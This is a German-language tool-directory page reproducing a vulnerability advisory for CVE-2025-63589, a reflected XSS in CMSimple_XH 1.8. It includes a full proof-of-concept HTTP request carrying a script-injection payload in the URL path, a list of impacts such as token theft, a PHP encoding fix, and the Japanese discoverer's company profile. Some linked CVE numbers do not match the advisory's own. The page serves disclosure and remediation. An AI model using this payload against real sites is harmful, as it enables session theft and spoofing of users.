Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-63589 — Reflektiertes XSS Proof-of-Concept für CMSimple_XH 1.8 mit nicht authentifizierter Skripteinschleusung über nicht bereinigte Pfadsegmente, einschließlich CVSS 6.1 Bewertung und PHP-Reparaturbeispiel. | Kitploit
Tools/GitHubGitHub/cybercrewinc/cve-2025-63589
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubcybercrewinc/cve-2025-63589

CVE-2025-63589

Reflektiertes XSS Proof-of-Concept für CMSimple_XH 1.8 mit nicht authentifizierter Skripteinschleusung über nicht bereinigte Pfadsegmente, einschließlich CVSS 6.1 Bewertung und PHP-Reparaturbeispiel.

Repository anzeigen
vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-63589 Reflektiertes XSS in CMSimple_XH index.php-Pfadbehandlung

Entdeckt: 6. Oktober 2025
Produkte: CMSimple_XH (Open-Source-Flatfile-CMS)
Betroffene Versionen: 1.8 CVE(s): CVE-2025-63589 Authentifizierung erforderlich: Keine (nicht authentifiziert)
Angriffstyp: Reflektiertes Cross-Site Scripting (XSS)
Geschätzter CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Medium)

Der Front-Controller in index.php akzeptiert dynamische Pfadsegmente (die zum Routing zu Templates/Seiten verwendet werden) und übergibt diese Werte an die Template-Rendering-Engine. Der Code bereinigt oder HTML-kodiert diese Pfadsegmente nicht ordnungsgemäß, bevor sie in Attribute und Anchor-hrefs eingefügt werden. Dadurch wird eine speziell präparierte Anfrage-URI mit Zeichen wie "> und injizierten Tags (z. B. <script>...</script>) unverändert in die HTML-Ausgabe übernommen und vom Browser ausgeführt.

Typische Reflexionspunkte sind:

  • Formular-action-Attribute (z. B. Login-/Suchformulare)
  • Navigations-/Menüpunkt-href-Attribute
  • Breadcrumbs / Locator-Navigation (<nav class="locator">)
  • Footer-Links (Druckansicht, Sitemap, Login, usw.)

Da die Eingabe in HTML-Attributkontexten und Anchor-Inhalten landet, ist eine standardmäßige Attributkodierung erforderlich, fehlt jedoch.

Proof-of-Concept (PoC)

Anfrage:

root@kitploit:~
POST /cmsimplexh/index.php/gjtqw"><script>alert(1)</script>co2cu HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates/TEMPLATE-overlay_03
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 32

search=Search...&function=search
Pasted image 20251006203832

Antwort:

Pasted image 20251006203959
Pasted image 20251006204254

Die injizierte Nutzlast gjtqw"><script>alert(1)</script>co2cu wird unkodiert in Menülinks, Breadcrumbs, Suchformular-Action und Footer-Links übernommen, was bei der Darstellung der Seite zur Skriptausführung führt.

Vorgeschlagenes PHP-Beispiel für die sichere Ausgabe eines Action-Attributs:

root@kitploit:~
$safe_segment = rawurlencode($segment);              // Pfadsicherheit
$action = '/cmsimplexh/index.php/' . $safe_segment;
echo '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '">';

Auswirkungen

  • Clientseitige Codeausführung (beliebiges JS in den Browsern der Opfer ausführen)
  • Informationspreisgabe (DOM auslesen, clientseitig zugängliche Cookies/Tokens exfiltrieren)
  • Session-Hijacking / Identitätsdiebstahl, falls Session-Tokens für JS zugänglich sind (nicht HttpOnly)
  • UI-Spoofing / Phishing (gefälschte Login-Aufforderungen oder gefälschte Seiten anzeigen)
  • Erzwungene Aktionen, die mit der authentifizierten Sitzung des Opfers durchgeführt werden

Credits

Zugewiesene CVE: CVE-2025-63589

https://nvd.nist.gov/vuln/detail/CVE-2025-63588

Entdecker: 株式会社CyberCrew / サイバークル

Referenzen

https://github.com/cmsimple-xh/cmsimple-xh/blob/master/index.php

https://nvd.nist.gov/vuln/detail/CVE-2025-24576


✉️ お問い合わせ先

ご質問・ご相談などございましたら、お気軽にご連絡ください。


🏢 株式会社CyberCrew

G1@4x

📞 Tel: 03-6853-5823
📧 Mail:[email protected]


📄 会社概要

項目内容
会社名株式会社CyberCrew
所在地東京都千代田区外神田1-18-13 秋葉原ダイビル6階

🔐 主なサービス

🛡️ セキュリティ診断・リスク評価

組織の脆弱性を多角的に分析し、最適な改善策を提案します。

💻 ペネトレーションテスト

標的型・シナリオ型・LLMペンテスト まで対応。

🌒 ダークウェブモニタリング

機密情報の流出を早期に検知し、迅速に対応。

🎯 REDチーム演習・ソーシャルエンジニアリング

実践的な攻撃シナリオに基づく防御力評価を実施。

🧠 セキュアシステム設計・コンサルティング

開発初期段階からセキュリティを考慮した設計を支援します。


🌐 公式サイト:https://www.cybercrew.co.jp
🕒 CyberCrew — Your Trusted Security Partner.

Tool herunterladen